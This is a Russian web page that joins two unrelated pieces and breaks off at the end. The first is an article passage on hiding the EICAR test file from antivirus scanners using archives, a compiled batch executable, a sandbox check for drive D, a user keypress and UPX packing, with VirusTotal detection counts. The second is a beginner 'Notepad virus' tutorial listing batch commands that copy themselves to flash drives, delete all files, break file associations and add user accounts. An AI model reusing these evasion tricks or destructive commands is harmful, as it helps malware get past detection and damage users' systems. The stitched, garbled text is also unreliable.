Скрипт просто распаковывает архив и запускает полученный файл. QBC позволяет не только сформировать простейший исполняемый файл на основе этого скрипта, но и включить в этот файл необходимое (7za.exe и архив eicar-fun.7z), доступ к которому выполняется через переменную %myfiles%.

Полученный выполняемый файл может быть без открытия окна терминала (так называемый «Ghost»), а это нам как раз и надо:

Итоговый код выглядит следующим образом:

После компиляции полученный файл dumb_bat.exe распаковывает Eicar и запускает его.

Смотрим итог проверки этого файла на VirusTotal

Забавно, детект уменьшился с 60 для неупакованного файла и 41 для архива до 17 — при этом ни один из антивирусных движков не обнаружил Eicar, детекты явно имеют эвристический характер, а в ряде случаев напоминают ложное срабатывание (DrWeb, Baidu и др.)

Пойдём дальше — добавим в наш скрипт защиту от исполнения в тестовой среде — простейшую проверку, что файл выполняется в реальной системе. Для этого запустим распаковку только при условии, что в системе есть диск D и на нём есть хотя бы один файл:

Особое внимание — на низ таблицы, я его выделил отдельно, потому что на одну картинку всё не влезало:

Итак, проверка диска D «отломала» детекты китайцев, россиян и украинцев: Baidu, DrWeb, Zillya. При этом указанные движки, как и ряд других, были остановлены по таймауту (!)

Справедливости ради стоит отметить, что повторный запуск всё-таки довёл сканирование до конца

Однако в этом случае эксперимент нельзя считать «чистым», поскольку прошло значительное время после первой проверки.

Мне эта ситуация показалась любопытной — и я изменил строчку в коде на следующую:

Налицо разница в работе эвристиков ряда антивирусов (AegisLab и Baidu почему-то не обнаружили ничего во втором случае), а также налицо проблема в сканировании в случае проверки на наличие диска D. Впрочем, возможно это совпадение, хотя в ходе всего исследования я больше ни разу не наблюдал «отвала» такого количества движков сразу.

Движемся дальше — добавим нашему файлу интерактивности, которой точно не будет ни в одной тестовой среде. Изменим скрипт — сделаем его полноценным консольным (не «Ghost»), а также добавим команду pause:

Вот как выглядит итог выполнения такого файла:

Я не хочу наговаривать на пользователей, но кажется мне, что практически каждый нажмёт клавишу в этом случае :) В любом случае перед нами простой пример, который может быть завернут куда в более яркую обёртку социального инжениринга.

6 детектов из 67. Шесть, Карл! Все — эвристические. И скорее всего ничего не подозревающий пользователь посчитает файл безопасным.

Интересный итог я получил после сжатия итогового файла с помощью UPX командой:

Если делать это для самого первого нашего кода - который был вообще без проверок, то по детектам отвалился Antiy-AVL

Для последней же версии файл уменьшился, суть не изменилась, а вот детектов прибавилось

Детекты добавили китайцы, а вот украинский Zillya благополучно провалил тест.

Часть 4. Выводы

А можно без них? ;) Ну ладно.

Безусловно, описанное выше — это примитивно, просто и в жизни всё не так. Хотя бы потому, что в реальности выполнение нашего файла сначала вызовет срабатывания проактивки, а потом будет заблокировано резидентным модулем, который увидит итоговый файл Eicar.

Но дело не в том.

Дело в том, что современные антивирусные сканеры так и остались барахлом, которым были десяток-два лет назад, абсолютно пасующим перед простейшими видами упаковки кода. Решения в виде тестовых сред — «песочниц», эвристических анализаторов и т.д. только добавили неразберихи, ложных срабатываний, но по сути не защищают от реальной угрозы. Со старым, открытым и разжёванным до потрохов UPX как был бардак — так он и остался. А ведь я вполне мог упаковать не файл, вызывающий вредоносную активность, а непосредственно код, работать не с файлами на диске в %temp%, а в памяти, использовать не свободно доступные утилиты, а собственные или закрытые разработки — и таким образом обойти срабатывание резидентной защиты. Я вполне мог добавить интересные элементы интерфейса или скопировать таковой из распространённой программы — и обойти проактивку у неискушённого пользователя, который просто будет соглашаться с любыми запросами, доверяя тому, что запустил.

То, что мы сделали выше — примитивный способ обмануть антивирус, который может понять и реализовать практически любой. И он сработал. Что говорить про искушённых специалистов!

Архив с файлами, скриптами и результатами можно скачать здесь.

В архив не вошло следующее (не войдёт и не будет предоставлено по любой просьбе по понятным причинам): файлы, обработанные по выше изложенному механизму и содержащие:

Итак, приступим. Вы решили заняться вирусо-писательством. Сразу вам скажу, что эти вирусы, конечно, могут очень сильно навредить компьютеру, но полноценно передаваться с одного компьютера на другой они не могут. За все, что произойдет с вашим компьютером отвечаете вы и только вы. Приступим:

1) Открываем блокнот;

2) Пишем в нем « mspaint », без кавычек;

3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat ;

4) Откроем файлик и увидим, что открылся Paint))

Вот и готова наша первая программка. Вместо «mspaint» можно вписать любую программу, например: Calc-калькулятор, Taskmgr-диспетчер задач… Но при чем здесь вирусы? - спросите вы. Ни при чем)) Следующее, что мы сделаем, это программа для изменения времени на компьютере, да и еще она будит копировать себя на флешку (если та вставлена). Итак:

Первой сточкой мы изменяем время на 00:00, а второй скопируем файл на диск F - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате .bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число)) Теперь небольшой перечень того, что можно писать в блокнотовском вирусе.

1) «copy %0 x:\y» - копирует вирус на диск x в папку y(пример copy %0 C:\System.bat);

2) «label x:y» - переименовывает диск x на имя y(пример label C:error);

3) «time х:у» - меняет время на х часов и у минут (пример time 14:27);

4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05);

5) «md х» - создаст папку, в том месте, где наш вирус, с именем х(пример md Papka);

6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок);

7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у(кроме папок)(пример del F:\Data*.* /q);

8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у(пример assoc .exe=.mp3);

9) «net user "х" /add» - добавит на компьютер пользователя под именем х(пример net user "Smoked" /add);

Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя.

1) Программа для удаления файлов с флешки (если та вставлена) и переименования ее.

2) Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку.

Допустим, вы написали вирус, который будет портить открытую от папок информацию и немного вредить:

Читайте также: